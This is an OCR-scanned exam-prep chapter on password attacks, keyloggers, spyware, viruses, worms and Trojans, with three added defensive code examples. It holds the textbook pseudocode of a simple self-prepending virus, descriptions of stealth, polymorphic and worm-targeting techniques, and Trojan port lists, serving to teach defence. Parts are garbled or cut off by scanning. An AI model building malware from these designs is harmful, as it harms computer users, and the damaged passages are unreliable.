Q.4. Classify password cracking attacks and explain each.

Ans. Password cracking attacks are classified into the following categories —

(i) Online Attacks — An automated program will be executed by the attacker to try each password. The most popular online attack is the man-in-the-middle attack. It is also called the "bucket-brigade attack" or "Janus attack". In this attack, a connection is established between a victim and the server to which the victim is connected by eavesdropping on the network, and when the victim client tries to connect to the server, it is connected to the fraudulent server instead of the genuine server. The MITM server intercepts the call, hashes the password and passes the connection on to the genuine server. Using this attack, passwords of public accounts and passwords for financial websites can be cracked.

(ii) Offline Attacks — In offline attacks, systems are accessed and password files are copied from the computer to removable media. The offline attacks are applied from a different location. Some offline attacks are given below —

(a) Dictionary Attack — In this the attacker attempts to match all the possible dictionary words against the password, such as Admin.

(b) Hybrid Attack — In a hybrid attack a sequence of letters and numbers is used to guess the password, such as ABC123.

(c) Brute Force Attack — In this attack all possible permutations and combinations of letters, symbols and special characters are applied to guess the password.

(iii) Non-electronic Attacks — These types of attacks are not performed on computers. These attacks are based on the physical movement of a victim, e.g. shoulder surfing, in which the attacker keeps watch over a person's shoulder while he/she logs into the system.
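The guessable-password list in Q.3 and the dictionary, hybrid and brute-force attacks in Q.4 describe what a weak password looks like; an administrator's preventive check (purpose (ii) in Q.3) can test for exactly those patterns. The following is an added example, not from the textbook: it reports which of the page's categories a candidate password falls into, given what an attacker could know about the user. The profile fields, the 8-character threshold and the sample values are assumptions made for the example.

```python
"""Password guessability check built from the guessable-password list above.

Added example, not from the textbook. The profile fields and sample values
are constructed; the categories are the ones the answers to Q.3 and Q.4 list.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

DEFAULT_PASSWORDS = {"password", "admin", "administrator"}   # Q.3 (i)
KEYBOARD_ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm"]        # Q.3 (ii)
MIN_LENGTH = 8   # assumed threshold below which brute force is cheap


@dataclass
class UserProfile:
    """What an attacker could learn about the user (Q.3 (iii) to (vi))."""
    login: str = ""
    full_name: str = ""
    family_names: List[str] = field(default_factory=list)
    dob: str = ""                 # ISO date, e.g. "1990-07-15"
    birth_place: str = ""
    numbers: List[str] = field(default_factory=list)  # mobile, vehicle, house


def _keyboard_run(pw: str, min_len: int = 4) -> bool:
    """Any run of min_len adjacent keys from a QWERTY row, either direction."""
    low = pw.lower()
    for row in KEYBOARD_ROWS:
        for i in range(len(row) - min_len + 1):
            seg = row[i:i + min_len]
            if seg in low or seg[::-1] in low:
                return True
    return False


def _numeric_sequence(pw: str, min_len: int = 4) -> bool:
    """123456, 1234, 4321, 0000 and the like (Q.3 (vii))."""
    for run in re.findall(r"\d{%d,}" % min_len, pw):
        steps = {int(b) - int(a) for a, b in zip(run, run[1:])}
        if steps in ({1}, {-1}, {0}):
            return True
    return False


def _personal_tokens(p: UserProfile) -> List[str]:
    """Names, places and numbers an attacker would try, plus date formats."""
    tokens = [p.login, p.birth_place] + p.full_name.split() + p.family_names + p.numbers
    if p.dob:
        y, m, d = p.dob.split("-")
        tokens += [y, y + m + d, d + m + y, d + m + y[2:]]
    return [t.lower() for t in tokens if len(t) >= 3]


def guessability(pw: str, profile: Optional[UserProfile] = None) -> List[str]:
    """Return the reasons a password is guessable; an empty list means none
    of the checks fired."""
    reasons = []
    low = pw.lower()
    if low in DEFAULT_PASSWORDS:
        reasons.append("default password")
    if _keyboard_run(pw):
        reasons.append("keyboard sequence")
    if _numeric_sequence(pw):
        reasons.append("number sequence")
    if profile:
        hits = sorted({t for t in _personal_tokens(profile) if t in low})
        if hits:
            reasons.append("contains personal information: " + ", ".join(hits))
    if re.fullmatch(r"[A-Za-z]+\d{1,4}", pw):          # word+digits, Q.4 (ii)(b)
        reasons.append("word+digits pattern (hybrid attack)")
    if len(pw) < MIN_LENGTH:                            # cheap to brute force
        reasons.append("short enough for brute force")
    return reasons


# Constructed sample profile (not a real person).
SAMPLE_PROFILE = UserProfile(login="rahul", full_name="Rahul Sharma",
                             dob="1990-07-15", numbers=["9876543210"])

if __name__ == "__main__":
    for candidate in ["password", "qwerty1", "Rahul1990", "123456",
                      "ABC123", "c0rrect-Horse#Battery9"]:
        print(candidate, guessability(candidate, SAMPLE_PROFILE))
```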
Q.5. What is keylogging ? Explain types of keyloggers. (R.G.P.V., Nov. 2018)

Or


Write a short note on keyloggers.

Ans. When a person who is using the keyboard is unaware that the keystrokes pressed on the keyboard are being noted by others, it is known as keylogging. Keystroke logging or keylogging is the easiest way to hack passwords and monitor the victim's IT savvy behaviour. There are the following types of keyloggers —

(i) Software Keyloggers — The software programs installed on the computer system, located between the OS and the keyboard hardware, which record every keystroke, are known as software keyloggers. Such tools generally get installed on a computer as a DLL file and an EXE (Executable) file; the attacker installs them and the EXE file triggers the DLL to work. All recording is done by the DLL. The attacker can then get the victim's information.

(ii) Hardware Keyloggers — These are small hardware devices connected to the computer or keyboard without the knowledge of the user. The system must be accessed physically to install a hardware keylogger. The device saves every keystroke in a file or in the memory of the device. Devices of this type are installed on ATM machines to capture ATM card PINs by saving each keypress on the keypad.

(iii) Antikeyloggers — The keyloggers installed on a computer system can be detected and removed by antikeyloggers. Some of the advantages of antikeyloggers are as follows —

(a) The installation of keyloggers is detected by the antikeylogger, since firewalls are not able to detect it.

(b) Updates of signature bases are not required for antikeyloggers to work effectively.

(c) ATM and Internet banking frauds can also be prevented by antikeyloggers.

(d) Identity theft is prevented by this.
Q.6. Write short note on spyware. (R.G.P.V., Nov. 2019)

Ans. Spyware is also software that is installed to gather information about the user without their knowledge. Spyware is installed by the owner of a shared/public computer to secretly monitor other users. As the name implies, spyware means secret monitoring of users. All the personal information of users, such as Internet surfing habits, websites visited etc., is collected by spyware. Internet surfing activities can be changed by installing another utility on the victim's computer. Computer settings, resulting in slower Internet connection speeds and slowing of response time, can also be changed by spyware.

Some of the spywares are given below —

(i) A spy tool that records the URL of websites visited on the Internet. It has a powerful keylogger engine to capture all passwords.

(ii) eBlaster — It is a powerful spy. It records all e-mails sent and received, various files downloaded/uploaded, program searches and other activities, besides the keylogging and website watching.

(iii) Flexispy — This tool may be installed on mobile phones. After installation it secretly records the conversation on the phone and transfers it to an e-mail address.

(iv) Wiretap Professional — An application that is used for monitoring all activities on the system is called Wiretap Professional spy. The keystrokes and passwords can also be captured by it. All the chats and instant messages are captured by it, and other activities are also recorded by it.

(v) Spector Pro — This spy also captures all sent/received mails. Besides this it also records all websites visited.
Q.7. Write short note on viruses. (R.G.P.V., June 2005, Dec. 2006)

Ans. A virus is a program that can "infect" other programs by modifying them. The modification includes a copy of the virus program, which can then go on to infect other programs.

Biological viruses are tiny scraps of genetic code, DNA or RNA, that can take over the machinery of a living cell and trick it into making thousands of flawless replicas of the original virus. Like its biological counterpart, a computer virus carries in its instructional code the recipe for making perfect copies of itself. Lodged in a host computer, the typical virus takes temporary control of the computer's disk operating system. Then, whenever the infected computer comes into contact with an uninfected piece of software, a fresh copy of the virus passes into the new program. Thus, the infection can be spread from computer to computer by unsuspecting users who either swap disks or send programs to one another over a network. In a network environment, the ability to access applications and system services on other computers provides a perfect culture for the spread of a virus.

A virus can do anything that other programs do. The only difference is that it attaches itself to another program and executes secretly when the host program is run. Once a virus is executing, it can perform any function, such as erasing files and programs.
Q.8. Discuss the virus characteristics.

Ans. When a virus-infected program is run, the virus code is executed first. One of the first tasks of the virus code is to seek other programs not yet infected and pass on the infection to one or more of them. A truly malicious virus may then perform actions such as deleting certain files. An innocuous virus may attempt something benign like printing a "hello world" message. Execution of the virus is usually followed by execution of the host's original program.

All the virus code need not be located at the start of the infected file. In some cases the virus code is both prepended and appended to the host file. Virus code could also be split into several segments and interspersed through the infected file using JUMP statements at the end of each virus segment. In all of these cases, the size of the infected program is larger than the original program. This helps anti-virus software to detect infected code.

To evade detection, some viruses modify the file service routine that returns attributes of files. By so doing, the service routine may be programmed to return the uninfected length of the file. Another technique is to use compression so that the length of an infected file remains the same as the length of its original version. The virus writer includes a compression routine in the viral code. To infect another file, the virus first compresses that file and then prepends the virus code to the compressed file. The infected file must be uncompressed just prior to execution.

One of the characteristic features of many viruses is the set of system calls they make. System calls are used by application programs to request services of the operating system. They are made to read/write files, spawn new processes, establish TCP connections, etc. Some viruses make calls to copy their own code to other files, create/modify entries in the Windows registry, or search for e-mail. Such "suspicious" calls are often used to distinguish malicious from benign code.

Q.9. What is a compression virus ? 
compression virus ? 


Ans. Refer to Q.8.

Symptoms of Compression Virus Cruncher-1.0 — The symptoms of the compression virus Cruncher-1.0 are as follows —

(i) Unpredictable computer behaviour.

(ii) The operating system shows unexpected error messages.

(iii) Blue screen error in Windows.

(iv) The computer performs slowly.

(v) A program does not respond and displays a "not responding" error message.

(vi) Mysterious deletion of files and folders.

(vii) Spam messages being sent from your e-mail ID without your knowledge.

Removing Compression Virus Cruncher-1.0 — The compression virus Cruncher-1.0 can be removed in the following ways —

(i) Install anti-malware software.

(ii) The Windows registry must be kept clean and updated continuously.


Q.10. What are the characteristics of a virus ? Explain the structure of a virus in detail. (R.G.P.V., Dec. 2010, June ...)

Or

What can you do to detect a virus ? (R.G.P.V., June 2017)

Ans. Virus Characteristics — Refer to Q.8.

Virus Structure — A virus can be prepended or postpended to an executable program, or it can be embedded in some other fashion. The key to its operation is that the infected program, when invoked, will first execute the virus code and then execute the original code of the program. A very general structure of a virus is shown in fig. 5.1. In this case, the virus code, V, is prepended to infected programs, and it is assumed that the entry point to the program, when invoked, is the first line of the program.


    program V :=
    {goto main;
    1234567;

    subroutine infect-executable :=
      {loop:
      file := get-random-executable-file;
      if (first-line-of-file = 1234567)
        then goto loop
        else prepend V to file;}

    subroutine do-damage :=
      {whatever damage is to be done}

    subroutine trigger-pulled :=
      {return true if some condition holds}

    main: main-program :=
      {infect-executable;
      if trigger-pulled then do-damage;
      goto next;}

    next:
    }

Fig. 5.1 A Simple Virus


An infected program starts with the virus code and works as follows. The first line of code is a jump to the main virus program. The second line is a special marker that is used by the virus to determine whether or not a potential victim program has already been infected with this virus. When the program is invoked, control is immediately transferred to the main virus program. The virus program first seeks out uninfected executable files and infects them. Next, the virus may perform some action, usually detrimental to the system. This action could be performed every time the program is invoked, or it could be a logic bomb that triggers only under certain conditions. Finally, the virus transfers control to the original program. If the infection phase of the program is reasonably rapid, a user is unlikely to notice any difference between the execution of an infected and an uninfected program.

Once a virus has gained entry to a system by infecting a single program, it is in a position to infect some or all other executable files on that system when the infected program executes. Thus viral infection can be completely prevented by preventing the virus from gaining entry in the first place. Unfortunately, prevention is extraordinarily difficult because a virus can be part of any program outside a system. Thus, unless
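Two of the detection handles this answer and Q.8 give are that an infected program is larger than the original and that the Fig. 5.1 virus leaves its marker on the second line, while Q.8's compression trick defeats the length check but not a content hash. The following is an added example, not from the textbook: a baseline scanner that records size and SHA-256 of known-clean executables and reports growth, same-length rewrites and the marker near the entry point. The file names, the constructed byte strings standing in for binaries and the 64-byte window are assumptions made for the example.

```python
"""Baseline check for the infection signs described in Q.8 and Q.10.

Added example, not from the textbook. The "executables" below are constructed
byte strings standing in for real binaries; the marker is the one in Fig. 5.1.
"""
import hashlib
from typing import Dict, List, Tuple

INFECTION_MARKER = b"1234567"   # second-line marker of the Fig. 5.1 virus
ENTRY_WINDOW = 64               # assumed: bytes near the entry point to inspect


def fingerprint(data: bytes) -> Tuple[int, str]:
    """(length, sha256) of a file: length growth is the cheap tell (Q.8), the
    hash catches same-length rewrites such as the compression technique."""
    return len(data), hashlib.sha256(data).hexdigest()


def build_baseline(clean_files: Dict[str, bytes]) -> Dict[str, Tuple[int, str]]:
    """Fingerprint every known-clean executable."""
    return {name: fingerprint(data) for name, data in clean_files.items()}


def marker_near_entry(data: bytes) -> bool:
    """Fig. 5.1 puts the marker right after the initial jump, so an infected
    file shows it within the first few bytes, not just anywhere in the file."""
    return INFECTION_MARKER in data[:ENTRY_WINDOW]


def scan(files: Dict[str, bytes],
         baseline: Dict[str, Tuple[int, str]]) -> Dict[str, List[str]]:
    """Return {filename: [reasons]} for the files that look infected."""
    findings = {}
    for name, data in files.items():
        reasons = []
        size, digest = fingerprint(data)
        if name in baseline:
            base_size, base_digest = baseline[name]
            if digest != base_digest:
                if size > base_size:
                    reasons.append(f"grew by {size - base_size} bytes "
                                   "(code prepended/appended/interspersed?)")
                elif size == base_size:
                    reasons.append("content changed but length unchanged "
                                   "(compression or stealth technique?)")
                else:
                    reasons.append(f"shrank by {base_size - size} bytes")
        else:
            reasons.append("not in baseline")
        if marker_near_entry(data):
            reasons.append("infection marker found near entry point")
        if reasons:
            findings[name] = reasons
    return findings


# Constructed stand-ins (not real binaries).
CLEAN = {
    "hello.bin": b"ENTRY hello\nprint 'hello world'\nEXIT\n",
    "calc.bin": b"ENTRY calc\nadd 2 3\nEXIT\n",
    "notes.bin": b"ENTRY notes\nopen notes.txt\nEXIT\n",
}
# Constructed prefix mimicking the Fig. 5.1 layout: jump, marker, body, main.
VIRUS_STUB = b"goto main\n1234567\n<constructed virus body>\nmain:\n"


def infected_snapshot() -> Dict[str, bytes]:
    """What a later scan might see: one file prepended (Q.10), one rewritten
    at the same length (the Q.8 compression trick), one untouched."""
    same_len = CLEAN["calc.bin"].replace(b"add 2 3", b"xxx 9 9")  # same length
    return {
        "hello.bin": VIRUS_STUB + CLEAN["hello.bin"],
        "calc.bin": same_len,
        "notes.bin": CLEAN["notes.bin"],
    }


if __name__ == "__main__":
    for fname, why in scan(infected_snapshot(), build_baseline(CLEAN)).items():
        print(fname, why)
```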


Q.11. Ans. Refer to Q.7 and Q.10. (R.G.P.V., Nov. ...)


Q.12. Explain various types of viruses. (R.G.P.V., June 2019)

Or

Briefly describe the types of viruses. (R.G.P.V., Dec. 2012)

Or

Classify the different categories of viruses. (R.G.P.V., Dec. 2016)

Ans. The following categories are identified as being among the most significant types of viruses —

(i) Stealth Virus — A form of virus explicitly designed to hide itself from detection by antivirus software. One example is a virus that uses compression so that the infected program is exactly the same length as an uninfected version. Far more sophisticated techniques are possible. For example, a virus can place intercept logic in disk I/O routines, so that when there is an attempt to read suspected portions of the disk using these routines, the virus will present back the original, uninfected program. Thus, stealth is not a term that applies to a virus as such but, rather, is a technique used by a virus to evade detection.

(ii) Polymorphic Virus — A virus that mutates with every infection, making detection by the "signature" of the virus impossible. This virus creates copies during replication that are functionally equivalent but have distinctly different bit patterns. As with a stealth virus, the purpose is to defeat programs that scan for viruses. In this case, the "signature" of the virus will vary with each copy. To achieve this variation, the virus may randomly insert superfluous instructions or interchange the order of independent instructions. A more effective approach is to use encryption. A portion of the virus, generally called a mutation engine, creates a random encryption key to encrypt the remainder of the virus. The key is stored with the virus, and the mutation engine itself is altered. When an infected program is invoked, the virus uses the stored random key to decrypt the virus. When the virus replicates, a different random key is selected.

(iii) Parasitic Virus — The traditional and still most common form of virus. A parasitic virus attaches itself to executable files and replicates, when the infected program is executed, by finding other executable files to infect.

(iv) Memory-resident Virus — Lodges in main memory as part of a resident system program. From that point on, the virus infects every program that executes.

(v) Boot Sector Virus — Infects a master boot record or boot record and spreads when a system is booted from the disk containing the virus.


Q.13. ... ? Explain different types of viruses. (R.G.P.V., Dec. 2013)

Ans. Refer to Q.7 and Q.12.

Q.14. What is virus ? What is virus structure ? Explain the types of viruses. (R.G.P.V., June 2012)

Ans. Refer to Q.7, Q.10 and Q.12.
Q.15. What are the two phases of execution of a virus ?

Ans. Viruses potentially have two phases to their execution — the infection phase and the attack phase.

Infection Phase — When a virus executes it has the potential to infect another program. When it would infect other programs is clearly not understood. Some viruses infect each time they are executed; other viruses infect only when triggered. This trigger could be anything; a day or time, an external event, a counter within the virus, and so forth. Virus writers want their programs to spread as far as possible before they are detected.

Many viruses go resident in the same or similar manner as Terminate and Stay Resident (TSR) programs. This means the virus waits for an external event before infecting additional programs. A virus may silently lurk in memory waiting for a user to access a diskette, copy a file, or execute a program, before it begins infecting. This makes viruses difficult to analyze, because it is hard to determine the trigger condition.

Attack Phase — Just as the infection phase can be triggered by an event, the attack phase also has its own trigger. Not all viruses attack, but all of them do use system resources, and frequently contain bugs. These bugs can cause negative side effects. In addition, viruses often delay revealing their presence by launching an attack only after they have had ample opportunity to spread. This means an attack could be delayed for days, weeks or longer.

The attack phase is optional; many viruses reproduce without a trigger condition. However, anything that writes itself to a disk without permission is stealing storage and CPU cycles. Viruses that "only infect", with no attack phase, often damage programs or disks. This is not an intentional act of the virus, but simply the result of poorly written code.


Q.16. What is virus ? How it works ? Explain its phases of execution. (R.G.P.V., Dec. 2015)

Ans. Refer to Q.7, Q.10 and Q.15.


Q.17. What are the different ways to infect computer systems through viruses ?

Ans. There are the following ways in which viruses infect computer systems —

(i) Boot Sector Penetration — The boot sector is the first sector on every disk. In a boot disk, the sector contains the code that powers up a computer. In a non-bootable disk, it contains the file allocation table (FAT), which is automatically loaded when the disk is accessed.

(ii) Macro Penetration — Because macros are small language programs that execute after embedding themselves into surrogate programs, their penetration is very effective. The rising popularity in the use of script in web programming is resulting in macro virus penetration becoming one of the fastest forms of virus transmission.

(iii) Parasites — These are viruses that attach themselves to healthy executable programs and wait for any event where such a program is executed. Nowadays, due to the spread of the Internet, this method of penetration is the most widely used and the most effective. Examples of parasite viruses include Friday the 13th, Michelangelo, SoBig, and the Blaster viruses.


Q.18. Discuss digital immune system. (R.G.P.V., Dec. 2009, 2012)

Ans. The digital immune system is a comprehensive approach to virus protection developed by IBM. The motivation for this development has been the rising threat of Internet-based virus propagation.

In response to the threat posed by these Internet-based capabilities, IBM has developed a prototype digital immune system. The objective of this system is to provide rapid response time so that viruses can be stamped out as soon as they are introduced. When a new virus enters an organization, the immune system automatically captures it, analyzes it, adds detection and shielding for it, removes it, and passes information about that virus to systems running IBM AntiVirus so that it can be detected before it is permitted to run elsewhere.
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=N A Virus Infected 

n we = | Client Machine 

A Administrative 
Machine 


Private 
Network 


lyze Virus 
behaviour and 
Structure 


Client 
Machine 


Client 
Machine 


Extract 
Signature 


Derive 
Prescription 


Administrative 
Machine 


pie 


Network 


Individual 
User 


Fig. 5.2 Digital Immune System 
The steps in digital immune system operation are shown in fig. 5.2 — 
(i) A monitoring program on each PC uses a number of heuristics 
on the basis of system behaviour, suspicious changes to programs, or family 


signature to infer that a virus may be present. A copy of any program thought 


to be infected is sent by the monitoring program to an administrative machine 
within the organization. 


(ii) The administrative machine encrypts the sample and sends it to 
a central virus analysis machine. 


(iii) This machine creates an environment in which the infected 
Program can be safely run for analysis.The techniques used for this purpose 
are emulation, or the creation of a protected environment within which the 
Suspected program can be executed and monitored. Then, the virus analysis 
machine produces a Prescription for identifying and removing the virus. 


(iv) The resulting prescription is sent back to the administrative machine. 


i (V) The administrative machine sends the prescription to the infected 
client. 


(vi) The Prescription is also sent to other clients in the organization. 


(vii) Subscribers around the world get regular antivirus updates that 
Protect them from the new virus. 
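The “extract signature” and “shield other clients” steps above can be shown in miniature. The following C program is an added example, not code from the textbook or from IBM’s product: it derives a signature from a clean copy and an infected copy of the same program (the bytes the infection inserted) and then scans a third file for that signature. All three file images are constructed for the example, and the single-insertion assumption is a simplification of what a real analysis machine does.

```c
/* Added example (not from the textbook or IBM's product): a toy version of
 * two steps of the digital immune system, "extract signature" and "shield
 * other clients". All sample data below is constructed for the example. */
#include <stddef.h>
#include <string.h>

#define MAX_SIG 64

/* Derive a signature from a clean copy of a program and an infected copy of
 * the same program: the bytes that the infection inserted. Returns the
 * signature length, or 0 when no usable signature could be derived. */
size_t extract_signature(const unsigned char *clean, size_t clean_len,
                         const unsigned char *infected, size_t inf_len,
                         unsigned char *sig, size_t sig_cap)
{
    size_t prefix = 0, suffix = 0;

    if (inf_len <= clean_len)          /* nothing was added: no signature */
        return 0;

    /* longest common prefix */
    while (prefix < clean_len && clean[prefix] == infected[prefix])
        prefix++;

    /* longest common suffix that does not overlap the prefix */
    while (suffix < clean_len - prefix &&
           clean[clean_len - 1 - suffix] == infected[inf_len - 1 - suffix])
        suffix++;

    size_t sig_len = inf_len - prefix - suffix;   /* the inserted run */
    if (sig_len == 0 || sig_len > sig_cap)
        return 0;
    memcpy(sig, infected + prefix, sig_len);
    return sig_len;
}

/* Scan an arbitrary file image for the signature. Returns 1 if the
 * signature occurs anywhere in the buffer, 0 otherwise. */
int scan_for_signature(const unsigned char *buf, size_t len,
                       const unsigned char *sig, size_t sig_len)
{
    if (sig_len == 0 || len < sig_len)
        return 0;
    for (size_t i = 0; i + sig_len <= len; i++)
        if (memcmp(buf + i, sig, sig_len) == 0)
            return 1;
    return 0;
}

/* Constructed samples: a "program", the same program with a payload
 * inserted (the copy the monitoring program forwarded), and an unrelated
 * file that carries the same payload. */
static const unsigned char CLEAN[]    = "HEADER|code|code|code|END";
static const unsigned char INFECTED[] = "HEADER|code|<PAYLOAD>|code|code|END";
static const unsigned char OTHER[]    = "OTHERAPP|<PAYLOAD>|data|END";

/* Whole pipeline: derive the signature from the pair, then report whether
 * the third file carries it. Returns 1 when OTHER is flagged. */
int demo_detects_other(void)
{
    unsigned char sig[MAX_SIG];
    size_t n = extract_signature(CLEAN, sizeof CLEAN - 1,
                                 INFECTED, sizeof INFECTED - 1, sig, MAX_SIG);
    return scan_for_signature(OTHER, sizeof OTHER - 1, sig, n);
}
```

The derived signature here is the inserted run `<PAYLOAD>|`; the clean program does not match it, the unrelated file does. A real prescription also has to describe how to remove the inserted bytes, which this toy leaves out.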


Q.19. What is virus ? How does the virus spread ? How to protect against virus ? (R.G.P.V., Nov. 2018)
Ans. Computer Virus — Refer to Q.7.
Spreading of Virus — Refer to Q.10.
Protection Against Virus — Refer to Q.18.


p — 
Q.20. Define worm.
Or
Write short note on worm.
Ans. A worm is sometimes considered a virus. The two have some similarities; however, the worm is an independent program that does not modify other programs, but reproduces itself over and over again until it slows down or shuts down a computer system or a network.

Q.21. Define the worm propagation model. (R.G.P.V., ...)
Ans. Refer to Q.20.


Q.22. Describe three phases of worm propagation. (R.G.P.V., June 2017)
Ans. There are three phases of worm propagation — target finding, worm transferring and infection.
Target Finding — In target finding phase, worms determine the target in different spaces. There are four classes in which worms find the target on the basis of space —
(i) Internet Worms — Internet worms search the target in the IP address space.
(ii) P2P Worms — P2P worms search the target in the P2P networks space.
(iii) E-mail Worms — E-mail worms search the target in the e-mail address space.
(iv) Instant Messaging (IM) Worms — IM worms search the target in the IM user IDs space.
Above classification is not strict. Many worms can use two or more classes. For example, the Nimda worm is an e-mail and Internet worm. Bibrog is an e-mail and P2P worm.
Worm Transferring and Infection — Worm transfer and infection can be done manually or automatically. From high to low, human intervention degrees can be of four types — manual transfer and manual infection, manual transfer and automatic infection, automatic transfer and manual infection, and automatic transfer and automatic infection.
Fig. 5.3 shows the four worm classes of human intervention ... Internet worms use automatic transferring and automatic infection via ... exploitation in which the worm code can be transferred and ... without any human efforts. IM worms and e-mail worms use ... and manual infection or manual transferring and automatic infection. ... all four human intervention degrees.

[Fig. 5.3 Four Worm Classes — vertical axis, target space: P2P network neighbors (P2P worm), IM users (IM worm), IP addresses (Internet worm), e-mail addresses (e-mail worm); horizontal axis, from high to low human intervention: manual transfer & manual infection, manual transfer & automatic infection, automatic transfer & manual infection, automatic transfer & automatic infection.]


Q.23. What is the difference between viruses and worms ?
Ans. A virus and a worm are similar in that they’re both forms of malicious software (malware). A virus infects another executable and uses this carrier program to spread itself. The virus code is injected into the previously benign program and is spread when the program is run. Examples of virus carrier programs are macros, games, e-mail attachments, Visual Basic scripts, and animations.
A worm is a type of virus, but it’s self-replicating. A worm spreads from system to system automatically, but a virus needs another program in order to spread. Viruses and worms both execute without the knowledge or desire of the end user.


Q.24. Discuss the characteristics of a worm.
Ans. The various features of worms are as follows —
(i) Enhanced Targeting — The most important attribute of a worm is that it spreads its infection to other computers. But how does a worm know who to target next ?
Many target selection strategies have been proposed and implemented. Worms that spread through e-mail, for example, have an easy way to figure out their targets. All they need to do is look into their victim’s mailbox or e-mail address book to find a set of targets. A mobile worm obtains phone numbers of its potential victims from the phone book in the cellphone hosting the worm. Some web worms use search engines to harvest URLs of potentially vulnerable targets.
Internet scanning worms, on the other hand, scan the ... for vulnerable machines. The most straightforward ... is random scanning — choosing IP addresses at random. This was adopted by Code Red Version-I. However, Code Red Version-II adopted localized ...: 80% of the time, it attempted to connect to victims with ... network address (most significant 8 or 16 bits of the ...). ... was more successful since hosts in ... and be running the same software.
(ii) ... — ... penetrating the perimeter ... enterprise. Once inside, it exploited the Windows file ... within the enterprise, ... some other spreading method.
(iii) Enhanced Capabilities — ... there are techniques to evade detection. One such technique is disguising worm code. Different instances ... keys for encryption. Thus, the ... signatures. Such worms are said ...
Some worms need to be time-aware. They obtain the current date and time from a network time protocol (NTP) server and can initiate specific actions at specified points of time. This capability allows worms to remain dormant for extended periods of time and then strike in a concerted fashion by, for example, ... a denial of service attack at the same time. Some worms can update ... given URLs. Alternatively, they may access ... a set of URLs from which updated worm code ... downloaded. Finally, early e-mail worms used the host’s e-mail services ... more recent worms have been designed with a ... SMTP engine which they use to send mail.
(iv) Destructive Power — It is estimated that worms such as Code Red and ... caused billions of dollars in damage. How are these costs estimated ? ... estimate costs based on lost productivity, clean-up costs, and system downtime which affects business and revenues. Fast-spreading ... also caused severe network congestion problems disrupting normal Internet ... and contributing to system down-time. ... most worms thus far have been relatively benign. Some worms contributed attack packets to a DDoS attack or caused Website defacement. ... worm which appeared in March 2004, however, was qualitatively different. It was the first worm to carry a destructive payload. It ... section of the victim’s hard disk leading to a system crash. ... hard to imagine worms carrying far more destructive payloads that could crash many more systems.
The harm caused by a worm is not just destructive power measured in downtime, lost productivity, and system crashes. There are more sinister and subtle goals such as the stealing of sensitive personal and corporate information, which could remain undetected.

Q.25. What are the typical phases of operation of a virus or worm ? (R.G.P.V., Dec. 2017)
Ans. During its operation, a typical virus goes through the following four phases —
(i) Dormant Phase — The virus is idle. The virus will eventually be activated by some event, such as a date, the presence of another program or file, or the capacity of the disk exceeding some limit. Not all viruses have this stage.
(ii) Propagation Phase — The virus places an identical copy of itself into other programs or into certain system areas on the disk. Each infected program will now contain a clone of the virus, which will itself enter a propagation phase.
(iii) Triggering Phase — The virus is activated to perform the function for which it was intended. As with the dormant phase, the triggering phase can be caused by a variety of system events, including a count of the number of times that this copy of the virus has made copies of itself.
(iv) Execution Phase — The function is performed. The function may be harmless, such as a message on the screen, or damaging, such as the destruction of programs and data files.
A network worm exhibits the same characteristics as a computer virus: a dormant phase, a propagation phase, a triggering phase and an execution phase. The propagation phase generally performs the following functions —
(i) Search for other systems to infect by examining host tables or similar repositories of remote system addresses.
(ii) Establish a connection with a remote system.
(iii) Copy itself to the remote system and cause the copy to be run.
The network worm may also attempt to determine whether a system has previously been infected before copying itself to the system. In a multiprogramming system, it may also disguise its presence by naming itself as a system process or using some other name that may not be noticed by a system operator. As with viruses, network worms are difficult to counter. However, both network security and single-system security measures, if properly designed and implemented, minimize the threat of worms.
Q.26. Write short note on Trojan horse. (R.G.P.V., June 2008, Dec. 2015)
Or
Write short note on Trojans.
Ans. Trojans ride on the backs of other programs and are usually installed on a system without the user’s knowledge. A Trojan can be sent to a victim ... Instant Messenger (IM) attachment, IRC and ... Many programs supporting ... NetBIOS ..., spyware removal tools, system ... software ..., screen savers, pictures, games and videos can install a Trojan just by being downloaded.
Some well-known Trojans and the port(s) they use —
BackOrifice — 31337 or 31338
Deep Throat — 2140 and 3150
NetBus — 12345 and 12346
Whack-a-mole — 12361 and 12362
NetBus 2 — 20034
GirlFriend — 21544
Masters Paradise — 3129, 40421, 40422, 40423 and 40426

Q.27. What is a Trojan ? How does a Trojan work ? How Trojan horses affect the computer system/network ? (R.G.P.V., Nov. 2018)
Ans. Trojans come in two parts, a Client part and a Server part. When the victim runs the Server on his machine, the attacker will then use the Client to connect and start using the Trojan. TCP/IP protocol is the usual protocol for the communications, but some functions of the Trojans use the UDP protocol as well. When the Server is being run on the victim’s computer, it will try to hide somewhere on the computer, start listening for incoming connections from the attacker, modify the registry and/or use some other auto starting method.
It is necessary for the attacker to know the victim’s IP address to connect to his machine. Many Trojans have features like mailing the victim’s IP, as well as messaging the attacker via ICQ or IRC. This is used when the victim has a dynamic IP, which means every time you connect to the Internet you get a different IP (most of the dial-up users have this).
Most of the Trojans use auto-starting methods so even when you shut down your computer they’re able to restart and again give the attacker access to your machine. New auto-starting methods and other tricks are discovered all the time. The variety starts from “joining” the Trojan into some executable file you use very often like explorer.exe, for example, and goes to ... methods like modifying the system files or the Windows Registry. ... files are located in the Windows directory.


Q.28. List the different types of Trojans.
Ans. Trojans can be created and used to perform different attacks. Some of the most common types of Trojans are —
(i) Remote Access Trojans (RATs) — Used to gain remote access to a system.
(ii) Data-sending Trojans — Used to find data on a system and ...
(iii) Destructive Trojans — Used to delete or corrupt files on a system.
(iv) Denial of Service Trojans — Used to launch a denial of service attack.
(v) Proxy Trojans — This is a type of Trojan that uses the victim’s computer as a proxy server. This gives the attacker the opportunity to do everything from your computer, including the possibility of conducting credit card fraud and other illegal activities, or even to use your computer to launch malicious attacks against other networks.
(vi) FTP Trojans — Allows the attacker to use your computer as an FTP server. Installing this Trojan onto a computer would enable the intruder to download/upload files from his own computer, which could provide another avenue for more installation of malware.
(vii) Security Software Disabler Trojans — Used to stop antivirus software.

Q.29. Differentiate between Proxy Trojans and FTP Trojans. (R.G.P.V., Dec. 2016)
Ans. Refer to Q.28 (v) and (vi).


Q.30. In what ways a system can be defended from Trojan horse attack ?
